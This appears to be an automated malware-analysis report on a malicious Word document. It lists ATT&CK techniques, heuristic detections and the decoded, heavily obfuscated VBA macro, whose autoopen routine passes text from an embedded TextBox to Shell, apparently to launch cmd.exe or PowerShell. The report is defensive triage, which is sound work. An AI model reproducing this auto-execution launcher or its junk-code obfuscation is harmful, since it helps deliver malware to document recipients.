Verdict: MALICIOUS
Risk Score: 292

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059.001 PowerShell
- T1204.002 Malicious File
The sample contains a VBA macro with an autoopen subroutine that utilizes the Shell() function. This function is used to invoke external command-line utilities, specifically cmd.exe and powershell.exe, as indicated by the heuristics. This strongly suggests the macro's purpose is to download and execute a secondary payload, a common technique for malware delivery.
Heuristics (10)

- ClamAV: Doc.Trojan.Agent-6784393-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Trojan.Agent-6784393-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Potential Shell call in VBA [critical] OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script: `_ .Shell(RifEW, PvJCIKR), ODKmGL) Set EEzwRXYYWmMJEWBYssiXq = qvQqmUzRkiwBrUaWVjZjQzv`
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low] OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script: `Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() iboRNoNsG`
- Suspicious cmd.exe invocation with execution flag [high] SC_STR_CMD: Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell [high] SC_STR_POWERSHELL: Reference to PowerShell
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11024 bytes |

SHA-256: 298b8ed499c854627de185665d97af143eb59ba7c24bd3bf1c28577f22c37809

Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 305 of 345 identifiers look randomly generated (e.g. 'VHMwNAkREvGqrUhjTCbXtTTQ'), consistent with name-mangling obfuscation.

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "bAMYOAWAq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
iboRNoNsG
End Sub
Attribute VB_Name = "iLPVmbqDzOp"
Function iboRNoNsG()
On Error Resume Next
Set AFjiWZQIjriYNNikdqcDSC = qHuNmFttzWFqdloAsi
Select Case raBcPGFlRlpEWzl
Case 294919323
cMdCmzkCIWAwppjZNLt = fiGhUbIIRjtssNYjACFcQZ
kEmcvGfImrDvwFv = 220358850
pckYdIGbRCYLFQZF = WdizMBmbGApSZbFVun
Case 258373053
iGwjAdEGzjadpciSzLdbwz = CByte(HQJsaTpLdmQnQhBwiz)
dZZLcztnViJLqlkoPqld = ChrW(HVzrYoSkzMviSTwhEhuhfT)
UaaCfsmHwTrWEcUDJaCY = Log(OhXRnHKJrvHntdRwlm)
End Select
Set wsKhUqcZSBorbbjERJz = zzSofYEWQQaFPPrzIiHmWKU
Select Case zWAKkREMldaAZWCvlGJ
Case 17379138
jbLjlviCNXnduoIXulw = OUmprYljLAPBRwQu
bzVWJXGnXfitYrVKrLOpWs = 83319210
CrNHmLvXOiTldpEz = BTtDmnJuqamCESimLTSK
Case 332833921
MjKfpYjjCGRJVZ = CByte(GQEENvlIVJQkwSVmmh)
GJtHzkLKXjkvzJ = ChrW(EDNGlGbboVYnkOjTib)
SJNJGTCkNckNTafNSZ = Log(wtfiElZwavrMGTbrKruG)
End Select
Set fFoismXXvAtIjHsnqNh = hYNTThqpWGRwhBS
Select Case iFrYbfJXuBiJXiFGNzrHsVLK
Case 317819470
BojvahptElWIiCPpYSChR = AKkkKLGNtjcsiUowazTiiT
ESprDwsIPRNoYLqXimrrq = 209838471
YuAarFNnJhafRUTDQAYNb = jQnkaprnbtZhQzCWB
Case 20397087
dDGzfYCLiaqRSK = CByte(NknHiYvVFhGkEVB)
zVLwMZSHLYiJNkbGWIjRitY = ChrW(hiBQYozpjfrwGMuoRfwG)
mIUFANvmkMGwhQiXCiXaoch = Log(fzKNvzCzSjvZhKYaBDwTkzY)
End Select
Set bOsfIZbmvVhHJfor = FoAIYRNAlpkrAZYOvi
Select Case kwsaVSLkNdNCsWTbFmEDzifW
Case 233901892
vvwJtOwpHVNOfpMjAWYnsV = zSbqfBGTVqfXQnDkwGDO
NrGPrQdIwwzaOwrSYRnACrXA = 118676981
szmajpGijaUbnldKXuhwCpMS = pQOuWUGzvXjWXPIUfOR
Case 326234653
dBXsTdSVtDlTArZsnNFNdsOz = CByte(AiZcWauUcMOqCDrnbCTuDX)
jcsBLjTkmaETwtsXdqw = ChrW(fKBlKOaBqvCkcHqAiZ)
lJbbQzjstjiqEEzrYaGrz = Log(RurXUqrDstEHNOE)
End Select
Set LKaVabLaWnbGTdMR = ZokMzDlrTjFjHlaFZUEiJAn
Select Case ENSwjLHnpqziiALGpiHsGq
Case 103995649
BBuJIikYBwHllo = HbStQlrWZIwsfsvf
wQvfQwfGFajjsZUBU = 339968824
nwwQJiVAKqFfGStnV = frcnmLKLnjidqLtisRzzmBv
Case 331568220
QzuaQwlzIoIoAJnFwr = CByte(RjzumcaboWGdwiSWMPlWhw)
hWkqrIMtoKGjoREHzqXz = ChrW(CLMKinapMVGVCRYCmjTc)
STpzdEHHnjKzBfKYfJUl = Log(bpzLmAjFLGDUAk)
End Select
Set hEdatNjaNisfwPo = wqucnUMaDpimwFpIZVrCBaB
Select Case UsrHYpDkPwmXYAR
Case 80264104
DXEjuiHokGcXlpYooHvdFBN = uXzSRjZEfKwDzWaNkSojb
dIOjjsWimBJSoXjo = 151314819
jYsarVqSjhtmNd = htoEiAjhwYwtfhDh
Case 313382963
nDDUCRtsRMopAofIHdrkoAzq = CByte(CvbLkdAzqZaGNqXLpjUtHYH)
WaZpLHnENYAWRhhj = ChrW(rJPFBtnUYwQiwninOoJDLm)
mVtoqBtIClFPOsHUjmVmI = Log(ZQkWiDsXfcFZdjIFwS)
End Select
Set fMsSHkCsdTUSjKwn = djpoPjqtRwuwTPbruIBHzz
Select Case rjiVJirjJcuJQIYPjB
Case 164713159
lHtKEsaoBzjniOwFkKhOZO = WYGLiWsVFaIjjpURQDChM
HiBKTiVUKQWWXlzjsSJbaMVf = 94173982
QtQLXhYaQbKYDNzkP = MNSjTjLjYkVuJWwDOcEzspz
Case 318181226
WWUPvbpwcTBwhZjznI = CByte(FWRocAzXjQzWPVOzNrUdIj)
hCuEhCYzFhJrwEisPvDJjczm = ChrW(SbTISifZYklhvRVHRuoF)
QtizFhEWREFIcObFrmCd = Log(ZUwKUdiBOiIjzCioI)
End Select
Set BamsJHPErMjsqkq = DqBkhaMDRrXuLzhFPRsoAO
Select Case GYaKQSzjzwXLifwZbNiaSj
Case 136166071
tfbcZrCppBvMHQvlUHYwnmw = SrRaRnXWDhQlrUKHthW
kkSKRzFKLWFGjAJiabYBi = 164536398
azKtAzQEFQRqiZG = ThMKhbJFqKchSJU
Case 17047720
bsLHEFNuSzqPKbIT = CByte(EUSObwpFCpUjlwvOf)
jvAPcwPPbSpjjTN = ChrW(FAkwAtVCBPtKjDvAfTcXRosT)
MXWPWGBVlquiiHnawOMFEiXX = Log(BPrqiRIQwnVwnfJrouNAWz)
End Select
Set IqczdppcGRoHnoiJKf = vbwZljGzXIKqIjW
Select Case AADaVhXHsdaVCEF
Case 329479965
kauLRqTWrRTwafaQihIHE = OEpjIGkvSDMJYFbujJjDdP
KSzzETWwqczLqW = 239401911
NmwzQjRHVpowwXAJzAiOL = fbvHVjatkXzbWRh
Case 107757129
bBpiPiYzScoMqrWWGGUDJN = CByte(hbFQwXBjcjNDMVcQwXJDD)
hujdEPLMNdNQICKOZaQtLd = ChrW(oJBipXjzKhvuKkVSmXP)
kqwNaGizjmKaESrTDl = Log(ojdCiNIzdDHiVwHrzM)
End Select
Const PvJCIKR = 0
Set UcsFhEIiwoqAlri = ZzXkRBjdjWNwaXtAkLOw
Select Case wiOfiqNkoNzrrioo
Case 160369203
SsPZLqMIYuqQadmRdPIFjL = trIQEitFMLWwDwXWYS
SStYnUFaBYfTFGWVhCa = 52437728
fpiEEjiSFskmJtDzTVv = IrjjsQphcpUzKzndPTinWHvj
Case 308759328
vNSWOjiIRnIzLnrAqQXmb = CByte(FZjzmIcBvzlLUbOG)
nTChzVRHvvVQfJIGlHt = ChrW(PuWjQrJMATQmkojTYdGESr)
MGkQqdFjTVTMtwWQHMFHcfj = Log(qZohHBoUXCKZjbSivjwQ)
End Select
Set CuXIijSnAkFbRw = XXwDoKiWtjOkqACJuIirco
Select Case DkzaihZTlzSQQiznrUXdb
Case 104594698
bnzaLTnHNimuSqkzoTMdnYkm = uUnXFLInlVnkHOAwpFhd
jzHUiKOmLDDLvRwAkIXiH = 218798861
zPhFMfzSCIvNXfDWAt = aSjYLzCwFzJzcz
Case 184904213
EBECHOkADADaUhlW = CByte(FHCNqVIJhsVtISNvVwUwr)
MhjVKtbdXLmOWsZwNfvsZVP = ChrW(uhpfwjRatLuUdVK)
iDUKGtwVVYkoBwUqS = Log(adDwfouMVKzETsUjKWB)
End Select
Set kNBuZvDKXuCFVSkMliiNKMp = zKdDAiEoFGUWTEvjws
Select Case qNHAKWlmOtYhXYfwORAKs
Case 278185363
APwOshmCPSczIqKTj = rpujZwzoHhPwirzzG
MItFcrJOvZXFEwUvBBUTp = 8935426
DZEnQklzIjYHXUmMC = KBYRCdQdmpwfmvKspf
Case 159645041
siKaOVfrwbPoRw = CByte(zrmXbWmzvAdzdwfiGozf)
rwCjwZhLaKNqQLADIziF = ChrW(OZkYBuRwIATRwItjrcwFl)
qQGNlibwqPZzcYSHwf = Log(PRJuZRDHTQUmAvtjU)
End Select
Set zRiOoujAQwRYUzs = uljIjTZcOqbwrYhhqAiiSi
Select Case McDqvwPFYzqEjGqWirBz
Case 327185486
iIrRkiTSKTQGWjjdii = kDABUAaAiAqRihtuuwiNjmFn
najKpANXzMPhHXQJip = 120702312
BlYdlmiAQSwzNijarq = zcufUdMnbNDwznTVBBFYDV
Case 87360150
jORTdqpSsASrHGD = CByte(ZwDmMTBKuIfZlR)
dPnwGLsKkXlGwUbNvzFwE = ChrW(atMNHZULQjaPpcTIz)
joTPbNEpSujbjSjLotltET = Log(YHEjhfztmAQSPzLSzIRGZb)
End Select
Set QECwSlHoYiOkGRR = zkTwAjzqSHYIFhj
Select Case kuAHbfTwiYrSCUShkDUf
Case 197323942
FhHMdLNwirzlzMRJiTRUT = rfnzprYBMBzDoTAPBHl
pAURUGPaVANJNdpcYjWW = 175505117
fwmwXzJSSJjnnrKWcibz = LnppLdXqUlOFIUXfYiRR
Case 17551046
DaaqwRCDnvdATIwGMUlcw = CByte(UhiWmrDAJjddkPPVfGo)
wTcHAPiSWzfajfFsL = ChrW(iKzmlwXqYhrqofnhZBF)
VXIldLBDtEJWJEbdQL = Log(fkKqBbfJAmCFEnoFGCOIZ)
End Select
RifEW = bAMYOAWAq.TextBox1 + mUJJE + fURjfQoW + VhviXIh + ZDipzpI + vIApiRX + wksbP + hoVLZ + nbRwwfT + vKbufj + KkGAhHO + mwEQtOjf + QUbHhm
Set kBvXcQstiHEjSBCVWGS = zioloJHvFjKNfHpDtKKW
Select Case dJZsCSMJXnHSCaGM
Case 66658954
TIwouwqELLwbMvwRTUOsm = vmiwDudjjrjbrOOpOcCwHAK
bLWlHlzRzcMKGztvaicHskEi = 15662787
FmqnjucmUrYsZwtSiOBE = RjGXcYDDqGoidfLaJtSiT
Case 190112752
XiFdOZFpjzuoCk = CByte(GWZjikjJwThsVVjWP)
hjoXvodkRIliqJqtmvJkwQ = ChrW(ZIJhhkUzbfAVAajbkFtTbY)
dYCbjnNipQwPOlHw = Log(zKJDpnpTDUYfFz)
End Select
Set pnjNOccOkfdJiXJ = SwAJsJLOGtdAsUXpiqDOj
Select Case KInwGzJjbwzqznQ
Case 116619280
jbVHUwcVQHnaoTvEM = sWuCOEWRfACUkYRcXmLwpK
cqpVIniElnBYvUdN = 107148749
DTbTvXPJLwItNwhLRLYjN = AwQhizVHtZvNmqjIvSFz
Case 182244222
wsZFrjCRohXYSfCNoQnEC = CByte(zAJrbJQGdOCSzYIdImFbl)
pNYEGhdpLXfNvYvzH = ChrW(BhDJWAfiFLHBwawjLvSXDid)
CimmdjhIiMaDKfrYYbbShJ = Log(FQLNAhkqSEQGrNtBWdz)
End Select
Set CWPMwKYFGhEBDDiC = NpmpmJdoXEZLNKKXTHMN
Select Case RFIIZNKfOwthwrRH
Case 165561409
NlXZFztsXtdjwWpTv = djMvSJIGfiPTtPurwbosA
PhqQBfCXsfvhdsDS = 124371280
QwTOcEANoFXNiDkTQ = ECIdEImkXLlBnjIabBqB
Case 33405359
PnqwziAswJcYNQGnuLcrjo = CByte(mRrEDbjdPZRmUmHIHjf)
bZOSrUoGfYNGaLDiI = ChrW(zQNjMzvilAnCUIBaAND)
MjnczqMLLJjcAhmOAvM = Log(XNjnTdEFEALqbkNOc)
End Select
Set UsFcWKYEQjbjHYN = AaFmwktEsDsPUsZuR
Select Case YAwQoZYwQanuWp
Case 107936686
quMXJjwAjSSIjXGjRFzNSj = fNzUSRzjCzfBihtspBvhVH
OsTGcRqDWHIhJMOfj = 250089700
PJEVcwXNKLWCQXzicwKVPM = JuWAjfaWMvjsGKWrHEDjrzFs
Case 60291275
dmjYQWCMubFwohjp = CByte(HjfqYFGDQLjEKpir)
BnpniNptPumJQWwCozL = ChrW(VFjaVzKWIkmbGQfwzXcT)
zILUtApjCVrSOCwHPRiDTl = Log(ILCAqACRUsnYzVFbzUmF)
End Select
Set vWMavmlsYSBEqYAblUwB = irCKPSGICczznsdXsobiM
Select Case woHKXCDwQLhvRiKQfUi
Case 237918457
pBGDfXEtfVTXEsOCFu = EGLoQsbwNcJHDc
ImBGrfzDkpOXNl = 316056137
aaafPiNqLEYqQWNP = AkbBwCYFCawBUONROihczoi
Case 167424946
vmGImOcwcMBUMcXC = CByte(MDOoqqLZBnjnwMFCqDP)
wQMWDsBLwCGKaXbbL = ChrW(EwuikavLiAwSVZHjdw)
rlwpzdwhWMakdqUzTXNflbr = Log(APihhCqtikTkFHuF)
End Select
IsNjokFwP = Array(LdCJqzz, zEXaaiwl, piihf, Interaction _
_
_
_
_
_
_
_
.Shell(RifEW, PvJCIKR), ODKmGL)
Set EEzwRXYYWmMJEWBYssiXq = qvQqmUzRkiwBrUaWVjZjQzv
Select Case mwkucNrSrLNCfakD
Case 164427916
BiLCijwWXzzJbtz = DqjFoXnfKjHYqu
VHMwNAkREvGqrUhjTCbXtTTQ = 198884234
jswYafdzcCPzmDTYfJijvKcz = VPWFBowRRUrTfVaNrsfTVQ
Case 154585711
UoJhzAVPAkEQGu = CByte(NTfUjbFzoHTDSzdSFrT)
NiOURzcSvQKGzSRzqvobP = ChrW(UZizCSWRwYmKMiFLCjzmDY)
MFAfdcKDsUYKoqUwJvdRlUnF = Log(uisEbdlwcRrCntpoUupoY)
End Select
Set hIWSLXKDtTJPXj = LYwrvwzZZqtbAVOotG
Select Case jHouwEiWDXIazlk
Case 61543525
vhsDijzbSvJhffPIQCLXiC = QbvCQPvqQMYtMODwXrSdIU
YrtShiYmKsubcnhjMWFtVG = 253821352
tNEnfLYfwmWKXz = HraNASnaLqKGHCaTS
Case 33008738
YTilGzUOipQWJOHwCvsmkG = CByte(twVFRcVSDFhYudGTOjDIku)
ArzEYYaSFRhlokuDmI = ChrW(NRcpNVwbdGhzBzcUNR)
ztdmbGNrRjUcRzNjDYB = Log(jczwMYUflLPhlNLdkiAjzd)
End Select
Set VrDUHsvCvchHfqEmciZQWjJ = HlMLoTKFFwloJYQow
Select Case CfjWmXAslAzpUlhlNWfjObSb
Case 13529571
FPcDOkSYhihkwpLviJFPb = GXKtIOjaMIUDSkPhmOXwEDEd
qYStJVmHFIFtUcDoGSZ = 109279025
WajAXqsfvDThVSqRhDmivNb = nRmTHzliMdTzmsmi
Case 301877471
JFlMzJNXYOnizJzVNFEY = CByte(zSoUswsfpRHoSDWYbSc)
jYWrddKwQfjaVFL = ChrW(wrHLVsjzfuhGdzlnbSnYvz)
OouPKkjSNribjLRkrpYLjvD = Log(SttzDRmrzBsXbdZNzb)
End Select
End Function